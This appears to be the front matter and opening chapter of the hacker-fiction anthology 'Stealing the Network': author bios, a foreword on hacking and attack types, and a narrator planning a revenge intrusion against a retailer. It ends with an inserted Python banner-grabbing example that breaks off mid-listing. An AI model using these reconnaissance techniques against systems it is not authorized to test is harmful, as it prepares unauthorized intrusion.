131ah is the technical director and a founding member of an IT security analysis company. After completing his degree in electronic engineering, he worked for four years at a software engineering company specializing in encryption devices and firewalls. After numerous “typos” and “finger trouble,” which led to the malignant growth of his personnel file, he started his own company along with some of the country’s leaders in IT security. Here, 131ah heads the Internet Security Analysis Team, and in his spare time plays with (what he considers to be) interesting concepts such as footprint and web application automation, worm propagation techniques, covert channels/Trojans and cyber warfare. 131ah is a regular speaker at international conferences including Black Hat Briefings, DEFCON, RSA, FIRST and Summercon. He gets his kicks from innovative thoughts, tea, drinking, lots of bandwidth, learning cool new stuff, Camels, UNIX, fine food, 3 A.M. creativity, and big screens. 131ah dislikes conformists, papaya, suits, animal cruelty, arrogance, and dishonest people or programs.
Raven Alder: How to Own an Identity: Contributing Author of Chapter 26, Primary Character: Natasha.
Raven Alder is a Senior Security Engineer for Nexum, Inc. She specializes in scalable enterprise-level security, with an emphasis on defense in depth. She designs large-scale firewall and IDS systems, and then performs vulnerability assessments and penetration tests to make sure they are performing optimally. In her copious spare time, she teaches network security for LinuxChix.org and checks cryptographic vulnerabilities for the Open Source Vulnerability Database. Raven lives in Seattle, Washington. Raven was a contributor to Nessus Network Auditing.
Jay Beale: How to Own a Continent: Contributing Author of Chapter 14, Primary Character: Flir. How to Own an Identity: Contributing Author of Chapter 28, Primary Character: Flir.
Jay Beale is an information security specialist, well known for his work on mitigation technology, specifically in the form of operating system and application hardening. He’s written two of the most popular tools in this space: Bastille Linux, a lockdown tool that introduced a vital security-training component, and the Center for Internet Security’s Unix Scoring Tool. Both are used worldwide throughout private industry and government. Through Bastille and his work with CIS, Jay has provided leadership in the Linux system hardening space, participating in efforts to set, audit, and implement standards for Linux/Unix security within industry and government. He also focuses his energies on the OVAL project, where he works with government and industry to standardize and improve the field of vulnerability assessment. Jay is also a member of the Honeynet Project, working on tool development.
Jay has served as an invited speaker at a variety of conferences worldwide, as well as government symposia. He’s written for Information Security Magazine, SecurityFocus, and the now-defunct SecurityPortal.com. He has worked on five books in the information security space. Three of these, including the best-selling Snort 2.1 Intrusion Detection, make up his Open Source Security series. The other two are from the Stealing the Network series.
Jay makes his living as a security consultant with the firm Intelguardians, which he co-founded with industry leaders Ed Skoudis, Eric Cole, Mike Poor, Bob Hillery, and Jim Alderson, where his work in penetration testing allows him to focus on attack as well as defense.
Prior to consulting, Jay served as the Security Team Director for MandrakeSoft, helping set company strategy, design security products, and push security into the third largest retail Linux distribution.
Jay Beale would like to recognize the direct help of Cynthia Smidt in polishing this chapter. She’s the hidden force that makes projects like these possible.
Mark Burnett: How to Own the Box: Contributing Author.
Mark is a security consultant, author, and researcher who specializes in hardening Microsoft Windows-based servers and networks. He has spent the last ten years developing unique strategies and techniques for locking down servers and maintaining his specialized expertise in Windows security. Mark is author and coauthor of a number of security books including Perfect Passwords, Stealing the Network, and Hacking the Code. Mark writes articles for numerous magazines and web publications including Windows IT Pro, Security Pro VIP, SecurityFocus.com, and Windows Secrets. Microsoft has six times recognized Mark’s contribution to the Windows community with the Most Valuable Professional (MVP) award in IIS and Windows Enterprise Security.
Paul Craig: How to Own the Box: Contributing Author. How to Own a Continent: Contributing Author of Chapter 18, Primary Character: Dex.
Paul Craig is a principal security consultant at Security-Assessment.com in Auckland, New Zealand. Paul specializes in application penetration testing and provides security consultancy services throughout the Asia-Pacific region.
Paul is an active researcher in the field of information security and exploit development. In the past Paul has released security advisories relating to newly discovered flaws in products from commercial vendors such as Microsoft, Adobe, HP and 3Com. Paul is a published author and regularly speaks at security conferences around the globe in the field of information security.
Ido Dubrawsky (CCNA, CCDA, SCSA): How to Own the Box: Contributing Author.
Ido Dubrawsky is Microsoft’s Security Advisor for the Communications Sector Americas district. Prior to joining Microsoft he was the acting National Practice Lead for Security Consulting with AT&T’s Callisma subsidiary. Ido has nearly 20 years of IT experience with the past 10 years focusing predominantly on information security. Prior to his experience in AT&T/Callisma, Ido was a network security architect for Cisco Systems working on the SAFE Architecture in the Security Technologies Group where he authored a variety of white papers focusing on network security, intrusion detection and layer 2 security. Ido was also the technical editor for Syngress Press’ book, Building Enterprise DMZs 2nd Edition and co-authored or contributed to several other books by Syngress Press including Hack Proofing Your Network, Hack Proofing Sun Solaris 8, Cisco PIX Firewalls, Cisco Security Professional’s Guide: Secure Intrusion Detection, and Stealing the Network: How to Own the Box. Ido has written on numerous security topics in SysAdmin magazine as well as on SecurityFocus and has presented at various conferences around the world including Cisco’s Networkers, SANS, CSI, and RSA. Ido holds a Bachelor’s and Master’s degree from the University of Texas at Austin in Aerospace Engineering, holds the CISSP certification and is a longtime member of USENIX and SAGE as well as a member of ISSA and ISACA.
Riley “Caezar” Eller: How to Own an Identity: Contributing Author of Chapter 21, Primary Character: The woman with no name.
Riley “Caezar” Eller has extensive experience in internet embedded devices and protocol security. He invented automatic web vulnerability analysis and ASCII-armored stack overflow exploits, and contributed to several other inventions including a pattern language for describing network attacks. His credits include the Black Hat Security Briefings and Training series, “Meet the Enemy” seminars, the book Hack Proofing Your Network: Internet Tradecraft, and the “Caezar’s Challenge” think tank. As creator of the Root Fu scoring system and as a founding member of the only team to ever win three consecutive DEFCON Capture the Flag contests, Caezar is the authority on security contest scoring.
FX: How to Own the Box: Contributing Author. How to Own a Continent: Contributing Author of Chapter 17, Primary Character: h3X.
FX of Phenoelit has spent the better part of his life becoming familiar with the security issues faced by the foundation of the Internet, including protocol-based attacks and exploitation of Cisco routers. He has presented the results of his work at several conferences including DEFCON, Black Hat Briefings, and the Chaos Communications Congress. In his professional life, FX runs Recurity Labs, a Berlin-based security consulting and research company. His specialty lies in security evaluation and testing of custom applications and black box devices.
FX loves to hack and hang out with his friends in Phenoelit and wouldn’t be able to do the things he does without the continuing support and understanding of his mother, his friends, and especially his partner, Bine, with her infinite patience and love.
Gordon Lyon (aka Fyodor): How to Own a Continent: Contributing Author of Chapter 16, Primary Character: Sendai.
Gordon Lyon (also known as Fyodor) released the open source Nmap Security Scanner in 1997 and continues to coordinate its development. He also maintains the Insecure.Org, Nmap.Org, SecLists.Org, and SecTools.Org security resource sites and has written seminal papers on OS detection and stealth port scanning. He is a founding member of the Honeynet Project, a popular speaker at security conferences, and author or co-author of the books Nmap Network Scanning, Know Your Enemy: Honeynets and Stealing the Network: How to Own a Continent. Gordon is President of Computer Professionals for Social Responsibility (CPSR), which has promoted free speech, security, and privacy since 1981.
Joe Grand (aka Kingpin): How to Own the Box: Contributing Author. How to Own a Continent: Contributing Author of Chapter 15, Primary Character: The Don.
Joe Grand (aka Kingpin) is an electrical engineer, hardware hacker, and president of Grand Idea Studio, Inc. (www.grandideastudio.com), where he specializes in the invention, design, and licensing of consumer products, video game accessories, and modules for electronics hobbyists. He has also spent many years finding security flaws in hardware devices and educating engineers on how to increase security of their designs.
Involved in computers and electronics since the age of 7, Joe is a former member of the legendary hacker collective L0pht Heavy Industries and has testified before the United States Senate Governmental Affairs Committee regarding government and homeland computer security. He is the author of Hardware Hacking: Have Fun While Voiding Your Warranty and Game Console Hacking and is a frequent contributor to other texts.
Joe is also the sole proprietor of Kingpin Empire (www.kingpinempire.com), a hacker-inspired apparel project that gives back to the technology and health communities through charitable donations, and a co-host of Prototype This on Discovery Channel.
Brian Hatch: How to Own an Identity: Contributing Author of Chapter 25, Primary Character: Glenn.
Brian is Chief Hacker at Onsight, Inc., where he is a Unix/Linux and network security consultant. His clients have ranged from major banks that survived the subprime debacle, pharmaceutical companies that keep our children medicated, and—thus far—two major California browser developers. He has taught various security, Unix, and programming classes for corporations through Onsight and as an adjunct instructor at Northwestern University. He has been securing and breaking into systems since before he traded his Apple II+ for his first Unix system.
Brian is the lead author of Hacking Linux Exposed, and co-author of Building Linux VPNs, as well as articles for various online sites such as SecurityFocus, and is the author of the not-so-weekly Linux Security: Tips, Tricks, and Hackery newsletter. He is also a maintainer of Stunnel, the Universal SSL Wrapper, and added the SSL support for Nmap. Every network-addressable device he owns, down to his cell phone, has both an SSH client and server installed. Sadly, he has yet to get his PGP public key printed in QR Code on his business cards.
Brian is thrilled that his eight-year-old daughter has decided to switch to the Dvorak keyboard layout. Though there’s no TV in the house, she and her five-year-old twin siblings are able to have their mind rot by watching YouTube on the Intarweb.
In Brian’s free time he… wait, he doesn’t have any.
Chris Hurley (aka Roamer): How to Own an Identity: Contributing Author of Chapter 23, Primary Character: Saul.
Chris Hurley (Roamer) is a Penetration Tester working in the Washington, DC area. He is the founder of the WorldWide WarDrive, a four-year effort by INFOSEC professionals and hobbyists to generate awareness of the insecurities associated with wireless networks, and was the lead organizer of the DEFCON WarDriving Contest for its first 4 years.
Although he primarily focuses on penetration testing these days, Chris also has extensive experience performing vulnerability assessments, forensics, and incident response. Chris has spoken at several security conferences and published numerous whitepapers on a wide range of INFOSEC topics. Chris is the lead author of WarDriving: Drive, Detect, Defend, and WarDriving for Penetration Testers and a contributor to Aggressive Network Self-Defense, OS X For Hackers at Heart, and Infosec Career Hacking. Chris holds a Bachelor’s degree in computer science. He lives in Maryland with his wife Jennifer and their daughter Ashley.
Dan Kaminsky (aka Effugas): How to Own the Box: Contributing Author.
Dan Kaminsky is a Senior Security Consultant for Avaya’s Enterprise Security Practice, where he works on large-scale security infrastructure. Dan’s experience includes two years at Cisco Systems, designing security infrastructure for cross-organization network monitoring systems, and he is best known for his work on the ultra-fast port scanner, scanrand, part of the “Paketto Keiretsu,” a collection of tools that use new and unusual strategies for manipulating TCP/IP networks. He authored the Spoofing and Tunneling chapters for Hack Proofing Your Network, Second Edition and has delivered presentations at several major industry conferences, including LinuxWorld, DEFCON, and past Black Hat Briefings. Dan was responsible for the Dynamic Forwarding patch to OpenSSH, integrating the majority of the VPN-style functionality into the widely deployed cryptographic toolkit. Finally, he founded the cross-disciplinary DoxPara Research in 1997, seeking to integrate psychological and technological theory to create more effective systems for non-ideal but very real environments in the field. Dan is based in Silicon Valley, CA.
Tom Parker: How to Own a Continent: Contributing Author of Chapter Interludes. How to Own an Identity: Contributing Author of Chapter 29, Primary Character: Carlton.
Tom Parker is a computer security analyst who, alongside his work providing integral security services for some of the world’s largest organizations, is widely known for his vulnerability research on a wide range of platforms and commercial products. His most recent work includes the development of an embedded operating system, media management system and cryptographic code for use on digital video band (DVB) routers, deployed on the networks of hundreds of large organizations around the globe. In 1999, Tom helped form Global InterSec LLC, playing a leading role in developing key relationships between GIS and the public and private sector security companies.
Whilst continuing his vulnerability research, focusing on emerging threats, technologies and new vulnerability exploitation techniques, Tom spends much of his time researching methodologies aimed at characterizing adversarial capabilities and motivations against live, mission critical assets. He provides methodologies to aid in adversarial attribution in the unfortunate times when incidents do occur.
Currently working for NetSec, a leading provider of managed and professional security services, Tom continues his research into finding practical ways for large organizations to manage the ever-growing cost of security, through identifying where the real threats lie, and by defining what really matters.
Tom regularly presents at closed-door and public security conferences, including Black Hat Briefings, and is often referenced by the world’s media on matters relating to computer security. In the past, Tom has appeared on BBC News and is frequently quoted by the likes of Reuters News and ZDNet.
Ken Pfeil: How to Own the Box: Contributing Author.
Ken Pfeil is currently Executive Director and Head of Information Security, Americas Region for German Landesbank WestLB AG. Ken’s Information Technology and Security experience spans well over two decades, with strategic technical and executive experience at companies such as Microsoft, Capital IQ, Miradiant Global Network, Dell, Identix, Barnes and Noble.com, and Merrill Lynch. While at Microsoft Ken coauthored Microsoft’s “Best Practices for Enterprise Security” white paper series, was a technical contributor for the MCSE Exam “Designing Security for Windows 2000” and official course curriculum for the same. In 1998, Ken founded “The NT Toolbox” web site, where he oversaw all operations and led the company to acquisition by GFI Software in 2002. Ken is a Subject Matter Expert for CompTIA’s Security+ certification, a member of IETF, IEEE and New York Electronic Crimes Task Force groups, and participated on the Information Systems Security Association’s International Privacy Advisory Board covering GLBA. He reported on security risks and performed vulnerability analysis for Windows IT Pro Magazine’s “Security Administrator” publication for four years, and is a contributing expert for both Information Security and CSO Magazines. Ken has been a guest instructor at the Federal Law Enforcement Training Center and is a sought after speaker at industry conferences on information security matters. Ken was a 2005 and 2006 nominee for The Executive Alliance’s “Information Security Executive of the Year,” for both Tri-State and National awards.
Russ Rogers (CISSP, CISM, IAM): How to Own a Continent: Contributing Author of Chapter 13, Primary Character: Saul.
Russ Rogers is a penetration tester for a Federal Government contractor and former Co-Founder, Chief Executive Officer, Chief Technology Officer, and Principal Security Consultant for Security Horizon, Inc.
Russ is a United States Air Force veteran and has served in military and contract support for the National Security Agency and the Defense Information Systems Agency. Russ is also the editor-in-chief of The Security Journal and occasional staff member for the Black Hat Briefings. Russ holds an Associate’s degree in Applied Communications Technology from the Community College of the Air Force, a Bachelor’s degree from the University of Maryland in computer information systems, and a Master’s degree from the University of Maryland in computer systems management. Russ is a member of the Information System Security Association (ISSA), the Information System Audit and Control Association (ISACA), and the Association of Certified Fraud Examiners (ACFE). He is also an Associate Professor at the University of Advancing Technology (uat.edu) in Tempe, AZ. Russ has authored, co-authored, and edited a number of computer security related books including WarDriving: Drive, Detect, Defend: A Guide to Wireless Security, and SSCP Study Guide and DVD Training System. Russ has recently founded a new company, Peak Security, Inc., at peaksec.com.
Special Contributors
Anthony Kokocinski: How to Own an Identity: Special Contributing Author of Chapters 27 and 30.
Anthony Kokocinski started his career working for law enforcement in the great state of Illinois. Just out of college, he began working with some of Illinois’s finest against some of Illinois’s worst. After enjoying a road-weary career, he got away from “The Man” by selling out to work for the Computer Sciences Corporation. There he was placed into a DoD contract to develop and teach computer/network forensics. Although well-versed in the tome of Windows™, his platform of choice has always been Macintosh. He has been called a “Mac Zealot” by only the most ignorant of PC users and enjoys defending that title with snarky sarcasm and the occasional conversion of persons to the Mac “experience.”
I would like to thank all of the wonderful and colorful people I had the privilege and honor of working with in Illinois and parts of Missouri. This includes all of the civilian and investigative members of ICCI, and all of the extended supporters in the RCCEEG units. Many of you will find either your likenesses or those around you blatantly stolen for character templates in these vignettes. I would also like to thank all of the GDGs, past and present, from DCITP. Thanks should also be given to the few who have ever acted as a muse or a brace to my work. And of course to johnny, who insisted on a character with my name, but would not let me write one with his. Lastly, love to my family always, and wondrous amazement to my Grandmother who is my unwavering model of faith.
Foreword Contributors
Jeff Moss (aka The Dark Tangent): How to Own a Continent: Foreword Contributor. How to Own an Identity: Contributing Author of Chapter 21, Primary Character: Tom.
CEO of Black Hat, Inc. and founder of DEFCON, Jeff Moss is a renowned computer security scientist best known for his forums, which bring together the best minds from government agencies and global corporations with the underground’s best hackers. Jeff’s forums have gained him exposure and respect from each side of the information security battle, enabling him to continuously be aware of new security defense, as well as penetration techniques and trends. Jeff brings this information to three continents—North America, Europe, and Asia—through his Black Hat Briefings, DEFCON, and “Meet the Enemy” sessions.
Jeff speaks to the media regularly about computer security, privacy, and technology and has appeared in such media as Business Week, CNN, Forbes, Fortune, New York Times, NPR, National Law Journal, and Wired Magazine. Jeff is a regular presenter at conferences including Comdex, CSI, Forbes CIO Technology Symposium, Fortune Magazine’s CTO Conference, The National Information System Security Convention, and PC Expo.
Prior to Black Hat, Jeff was a director at Secure Computing Corporation, and helped create and develop their Professional Services Department in the United States, Taipei, Tokyo, Singapore, Sydney, and Hong Kong. Prior to Secure Computing Corporation, Jeff worked for Ernst & Young, LLP in their Information System Security division.
Jeff graduated with a BA in criminal justice. Jeff got halfway through law school before returning to his first love: computers. Jeff started his first IT consulting business in 1995. He is CISSP certified and a member of the American Society of Law Enforcement Trainers.
Anthony Reyes: How to Own an Identity: Foreword Contributor.
Anthony Reyes is a former Detective with the New York City Police Department’s Computer Crimes Squad (CCS). During his assignment with the CCS, he investigated computer intrusions, fraud, identity theft, intellectual property theft, and child exploitation. He served as the 2007 International President for the High Technology Crime Investigation Association and presently chairs the Education and Training Group for the National Institute of Justice’s Electronic Crime Partner Initiative. Mr. Reyes previously sat as an alternate member of New York Governor George E. Pataki’s Cyber-Security Task Force. Anthony is a published author, professor, and much sought after lecturer and practitioner around the world. As the Chief Executive Officer of the Arc Group of New York, a Wall Street based company, he provides consultant, investigation, and training services globally to large corporations and government agencies. Until January 1, 2008 he served as a consultant to China’s Ministry of Public Security for the 2008 Olympic Games.
Story Editors
D. Scott Pinzon (CISSP, NSA-IAM): How to Own a Shadow: Story Editor.
Scott Pinzon has worked in network security for seven years, and for seventeen years has written about high technology for clients both large (Weyerhaeuser’s IT department) and small (Seattle’s first cash machine network). As Editor-in-Chief of WatchGuard Technologies’ LiveSecurity Service, he has edited and published well over 1,300 security alerts and “best practices” network security articles for a large audience of IT professionals. He is the director and co-writer of the popular “Malware Analysis” video series, viewable on YouTube and Google Video by searching on “LiveSecurity.” Previously, as the founder and creative director of Pilcrow Book Services, Scott supervised the production of more than 50 books, helping publishers take manuscripts to bookstore-ready perfection. He studied Advanced Commercial Fiction at the University of Washington. Scott has authored four published young adult books and sold 60 short stories.
The majority of these clients are in the financial services industry, government, gaming and manufacturing where information security is an essential part of their core competency. SensePost analysts are regular speakers at international conferences including Black Hat Briefings, RSA, etc., and the SensePost “Innovation Center” produces a number of leading open-source and commercial security tools like BiDiBLAH, Wikto, Suru, etc.
For more information, visit http://www.sensepost.com
Technical Reviewers
Kevin Mitnick: How to Own a Continent: Technical Reviewer.
Kevin Mitnick is a security consultant to corporations worldwide and a cofounder of Defensive Thinking, a Los Angeles-based consulting firm (www.defensivethinking.com). He has testified before the Senate Committee on Governmental Affairs on the need for legislation to ensure the security of the government’s information systems. His articles have appeared in major news magazines and trade journals, and he has appeared on Court TV, Good Morning America, 60 Minutes, CNN’s Burden of Proof and Headline News, and has been a keynote speaker at numerous industry events. He has also hosted a weekly radio show on KFI AM 640, Los Angeles. Kevin is author of the best-selling book, The Art of Deception: Controlling the Human Element of Security.
Technical Inspiration
Roelof Temmingh: How to Own a Shadow: Technical Inspiration.
Roelof Temmingh was the fourth child born in a normal family of two acclaimed academic musicians in South Africa. This is where all normality for him stopped. Driven by his insatiable info lust he furthered his education by obtaining a B Degree in Electronic Engineering. Roelof's obsession with creativity led him to start a company along with a similarly minded friend. Together they operated from a master bedroom at Roelof's house and started SensePost. During his time at SensePost, Roelof became a veteran Black Hat trainer/speaker and spoke at RSA and Ruxcon, to name a few. He also contributed to many Syngress books such as How to Own a Continent and Aggressive Network Self-Defense. SensePost is continuing business as usual although Roelof left at the end of 2006 in order to pursue R&D in his own capacity.
Roelof thrives on "WOW"; he embodies the weird and he craves action. He loves to initiate and execute great ideas and lives for seeing the end product "on the shelves." Roelof likes to be true to himself and celebrate the "weird ones." His creativity can be found in the names and functions of the tools that he created, from Wikto and the infamous BiDiBLAH (which someone fondly described as "having a seizure on the keyboard") to innovative tools like Crowbar and Suru.
NGS Software: How to Own a Shadow: Technical Inspiration.
NGS Software is the leader in database vulnerability assessment. Founded by David and Mark Litchfield in 2001, the team at NGS has pioneered advanced testing techniques, which are both accurate and safe and which are employed by NGSSQuirreL, the award-winning VA and security compliance tool for Oracle, SQL Server, DB2, Informix and Sybase. Used as the tool of choice by government, financial, utilities and consulting organizations across the world, NGSSQuirreL is unbeatable.
Copyeditor
Jon Lasser: How to Own an Identity: Copyeditor.
Jon Lasser lives in Seattle, Washington, where he works in the computer industry and writes fiction.
Contents
Chapter 1: Hide and Sneak (Ido Dubrawsky) 7
Chapter 2: The Worm Turns (Ryan Russell and Timothy Mullen) 23
Chapter 3: Just Another Day at the Office (Joe Grand) 41
Chapter 4: h3X's Adventures in Networkland (FX) 63
Chapter 5: The Thief No One Saw (Paul Craig) 103
Chapter 6: Flying the Friendly Skies (Joe Grand) 119
Chapter 7: dis-card (Mark Burnett) 129
Chapter 8: Social (In)Security (Ken Pfeil) 143
Chapter 9: BabelNet (Dan Kaminsky) 157
Chapter 10: The Art of Tracking (Mark Burnett) 175
Appendix: The Laws of Security (Ryan Russell) 199
Foreword
Stealing the Network: How to Own the Box is a unique book in the fiction department. It combines stories that are fictional with technology that is real. While none of these specific events have happened, there is no reason why they could not. You could argue it provides a roadmap for criminal hackers, but I say it does something else: It provides a glimpse into the creative minds of some of today's best hackers, and even the best hackers will tell you that the game is a mental one. The phrase "Root is a state of mind," coined by K0resh and printed on shirts from DEF CON, sums this up nicely. While you may have the skills, if you lack the mental fortitude, you will never reach the top. This is what separates the truly elite hackers from the wannabe hackers.
When I say hackers, I don't mean criminals. There has been a lot of confusion surrounding this terminology, ever since the mass media started reporting computer break-ins. Originally, it was a compliment applied to technically adept computer programmers and system administrators. If you had a problem with your system and you needed it fixed quickly, you got your best hacker on the job. They might "hack up" the source code to fix things, because they knew the big picture. While other people may know how different parts of the system work, hackers have the big picture in mind while working on the smallest details. This perspective gives them great flexibility when approaching a problem, because they don't expect the first thing that they try to work.
The book Hackers: Heroes of the Computer Revolution, by Steven Levy (1984), really captured the early ethic of hackers and laid the foundation for what was to come. Since then, the term hacker has been co-opted through media hype and marketing campaigns to mean something evil. It was a convenient term already in use, so instead of simply saying someone was a criminal hacker, the media just called him a hacker. You would not describe a criminal auto mechanic as simply a mechanic, and you shouldn't do the same with a hacker, either.
When the first Web site defacement took place in 1995 for the movie Hackers, the race was on. Web defacement teams sprung up overnight. Groups battled to outdo each other in both quantity and quality of the sites broken into. No one was safe, including The New York Times and the White House. Since then, the large majority of criminal hacking online is performed by "script-kiddies"—those who have the tools but not the knowledge. This vast legion creates the background noise that security professionals must deal with when defending their networks. How can you tell if the attack against you is a simple script or just the beginning of a sophisticated campaign to break in? Many times you can't. My logs are full of attempted break-ins, but I couldn't tell you which ones were a serious attempt and which ones were some automated bulk vulnerability scan. I simply don't have the time or the resources to determine which threats are real, and neither does the rest of the world. Many attackers count on this fact.
How do the attackers do this? Generally, there are three types of attacks. Purely technical attacks rely on software, protocol, or configuration weaknesses exhibited by your systems, which are exploited to gain access. These attacks can come from any place on the planet, and they are usually chained through many systems to obscure their ultimate source. The vast majority of attacks in the world today are of this type, because they can be automated easily. They are also the easiest to defend against.
Physical attacks rely on weaknesses surrounding your system. These may take the form of dumpster diving for discarded password and configuration information or secretly applying a keystroke-logging device on your computer system. In the past, people have physically tapped into fax phone lines to record documents, tapped into phone systems to listen to voice calls, and picked their way through locks into phone company central offices. These attacks bypass your information security precautions and go straight to the target. They work because people think of physical security as separate from information security. To perform a physical attack, you need to be where the information is, something that greatly reduces my risk, since not many hackers in India are likely to hop a jet to come attack my network in Seattle. These attacks are harder to defend against but less likely to occur.
Social engineering (SE) attacks rely on trust. By convincing someone to trust you, on the phone or in person, you can learn all kinds of secrets. By calling a company's help desk and pretending to be a new employee, you might learn about the phone numbers to the dial-up modem bank, how you should configure your software, and if you think the technical people defending the system have the skills to keep you out. These attacks are generally performed over the phone after substantial research has been done on the target. They are hard to defend against in a large company because everyone generally wants to help each other out, and the right hand usually doesn't know what the left is up to. Because these attacks are voice-oriented, they can be performed from anyplace in the world where a phone line is available. Just like the technical attack, skilled SE attackers will chain their voice call through many hops to hide their location.
When criminals combine these attacks, they can truly be scary. Only the most paranoid can defend against them, and the cost of being paranoid is often prohibitive to even the largest company. For example, in 1989, when Kevin Poulsen wanted to know if Pac Bell was onto his phone phreaking, he decided to find out. What better way than to dress up as a phone company employee and go look? With his extensive knowledge of phone company lingo, he was able to talk the talk, and with the right clothes, he was able to walk the walk. His feet took him right into the Security department's offices in San Francisco, and after reading about himself in the company's file cabinets, he knew that they were after him.
While working for Ernst & Young, I was hired to break into the corporate headquarters of a regional bank. By hiding in the bank building until the cleaners arrived, I was able to walk into the Loan department with two other people dressed in suits. We pretended we knew what we were doing. When questioned by the last employee in that department, we said that we were with the auditors. That was enough to make that employee leave us in silence; after all, banks are always being audited by someone. From there, it was up to the executive level. With a combination of keyboard loggers on the secretary's computer and lock picking our way into the president's offices, we were able to establish a foothold in the bank's systems. Once we started attacking that network from the inside, it was pretty much game over.
Rarely is hacking in the real world this cool. Let's understand that right now. To perform these attacks, you must have extreme "intestinal fortitude," and let's face it, only the most motivated attacker would risk it. In my case, the guards really did have guns, but unlike Kevin, I had a "get out of jail free card," signed by the bank president.
In the real world, hackers go after the "low-hanging fruit." They take the least risk and go for the greatest reward. They often act alone or in small groups. They don't have government funding or belong to world criminal organizations. What they do have is spare time and a lot of curiosity, and believe me, hacking takes a lot of time. Some of the best hackers spend months working on one exploit. At the end of all that work, the exploit may turn out to not be reliable or to not function at all! Breaking into a site is the same way. Hackers may spend weeks performing reconnaissance on a site, only to find out there is no practical way in, so it's back to the drawing board.
In movies, Hollywood tends to gloss over this fact about the time involved in hacking. Who wants to watch while a hacker does research and tests bugs for weeks? It's not a visual activity like watching bank robbers in action, and it's not something the public has experience with and can relate to. In the movie Hackers, the director tried to get around this by using a visual montage and some time-lapse effects. In Swordfish, hacking is portrayed by drinking wine to become inspired to visually build a virus in one night. One of the oldest hacking movies, War Games, is the closest to reality on the big screen. In that movie, the main character spends considerable time doing research on his target, tries a variety of approaches to breaking in, and in the end, is noticed and pursued.
But what if …? What would happen if the attackers were highly motivated and highly skilled? What if they had the guts and skills to perform sophisticated attacks? After a few drinks, the authors of the book you are holding in your hands were quick to speculate on what would be possible. Now, they have taken the time and effort to create 10 stories exploring just what it would take to own the network.
When the movie War Games came out in 1983, it galvanized my generation and got me into hacking. Much like that fictitious movie introduced hacking to the public, I hope this book inspires and motivates a new generation of people to challenge common perceptions and keep asking themselves, "What if?"
—Jeff Moss
Black Hat, Inc.
www.blackhat.com
Seattle, 2003
Chapter 1: Hide and Sneak
Ido Dubrawsky
The people who ran this site had ticked me off. I bought some computer hardware from them, and they took forever to ship it to me. On top of that, when the stuff finally arrived, it was damaged. I called their support line and asked for a return or an exchange, but they said that they wouldn't take the card back because it was a closeout. Their site didn't say that the card was a closeout! I told the support drones that, but they wouldn't listen. They said, "policy is policy," and "didn't you read the fine print?" Well, if they're going to take that position … Look, they were okay guys on the whole. They just needed a bit of a lesson. That's all.
So, there I was, the day after Christmas, with nothing to do. The family gathering was over. I decided to see just how good their site was. Just a little peek at what's under the hood. There's nothing wrong with that. I've hacked a few Web sites here and there—no defacements, but just looking around. Most of what I hit in the past were some universities and county government sites. I had done some more interesting sites recently, but these guys would be very interesting. In fact, they proved to be a nice challenge for a boring afternoon.
Now, one of my rules is to never storm the castle through the drawbridge. Their Web farm for their e-commerce stuff (and probably their databases) was colocated at some data center. I could tell because when I did traceroutes to their Web farm, I got a totally different route than when I did some traceroutes to other hosts I had discovered off their main Web site. So, it looked like they kept their e-commerce stuff separated from their corporate network, which sounds reasonable to me. That made it easy for me to decide how I would approach their network. I would look at the corporate network, rather than their data center, since I figured they probably had tighter security on their data center.
TOOLS
First off, my platform of choice should be pretty obvious. It's Linux. Almost every tool that I have and use runs under Linux. On top of that, my collection of exploits runs really well under Linux. Now, OpenBSD is okay, and I'm something of a Solaris fan as well, but when I work, I work off a Linux platform. I don't care whether it's Red Hat, Mandrake, or Debian. That's not important. What's important is that you can tune the operating system to your needs. That's the key. You need to be able to be sure that the underlying operating system is reliable. On a related note, my homegrown tools are a mixture of Bourne shell, Expect, and Python scripts. There's a small amount of Perl in there as well, but most of the scripts are written in Python. Code reuse is important if you want to be successful at this game.
For network scanning, I prefer nmap. It's a great tool. I used to use strobe, but nmap provides so many more capabilities—everything from regular connection scans to FIN scans, UDP scans, slow scanning, fast scanning, controlling ports, and so on. It's my scanner of choice for identifying targets on a network. I occasionally rely on it for identifying the target operating system; however, I've found that, in some cases, this crashes the target machine, and that's something of a big giveaway.
For identifying the target operating system, I tend to rely on banner-grabbing. While nmap does provide for remote operating system (OS) fingerprinting, it can sometimes make mistakes. I've seen nmap identify a Solaris 7 host as an OpenBSD system. Banner-grabbing still remains sort of the "gold standard" for remote OS fingerprinting. Most system administrators just don't get it. They could make my job much more difficult if they would just take the time to reduce the identification profile of their systems. It doesn't take much—just a little effort. Banner-grabbing can be a bit risky, since it usually involves a full connection in order to get this information; however, bringing your intended target down by using nmap's OS fingerprinting capabilities is not necessarily a good idea either.
So what are good port choices for OS identification? Well, two of the more useful TCP ports for banner-grabbing include port 80 (WWW) and port 25 (SMTP). Port 21 (FTP) and port 23 (telnet) are not really good choices. If the other side is smart, they've got ports 21 and 23 locked down through router access control lists (ACLs), firewalled, or access-controlled through TCP wrappers. Any way you look at it, it's a pretty safe bet that those two ports are logged somewhere. Yes, you probably will get logged with WWW and SMTP as well. The difference is that the information usually is buried deep down in some log file that admins won't really look at, because they get thousands of connections all day, every day.
Now, for applications I rely on a variety of tools. Almost all of them are chosen for simplicity and for the ability to modify them for my own needs. For Web servers I prefer RFP's Whisker program. Yeah, I've tried Nikto and like it a lot (I even use it as a backup for Whisker), but I've gotten to really trust Whisker. You need to trust your tools if you're going to be successful with them. "But what about SSL servers?" you ask. Well, for those, there's sslproxy. While it in itself is not a tool to hack with, you can use it to provide the encryption to run Whisker against an SSL server. Nice, huh?
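The banner-grabbing the narrator describes, as an added example (my code, not a tool from the chapter): grab_banner() makes the full TCP connection to port 80 or 25 (and so, as the text warns, lands in the target's logs), and the parsers pull out the HTTP Server: header or the SMTP 220 greeting and map it to a platform guess. The PLATFORM_HINTS table is a heuristic of my own, and the SAMPLE_* responses are constructed, not captured from any real host; the last sample shows what a server with its identification profile reduced looks like to this kind of probe.

```python
"""Banner grabbing on TCP/80 and TCP/25 with a platform guess.

Added example, not the narrator's tool. PLATFORM_HINTS is a heuristic of
my own and the SAMPLE_* responses are constructed.
"""
import re
import socket
from typing import Optional, Tuple

HTTP_PROBE = b"HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n"

# Heuristic banner -> platform table (assumed, first match wins). Order
# matters: "Sun" is checked before the generic "sendmail" entry.
PLATFORM_HINTS = [
    (r"microsoft-iis/4\.0", "Windows NT 4.0"),
    (r"microsoft-iis/5\.0", "Windows 2000"),
    (r"microsoft-iis/6\.0", "Windows Server 2003"),
    (r"cisco-ios", "Cisco IOS"),
    (r"\bsun\b|solaris", "Sun / Solaris"),
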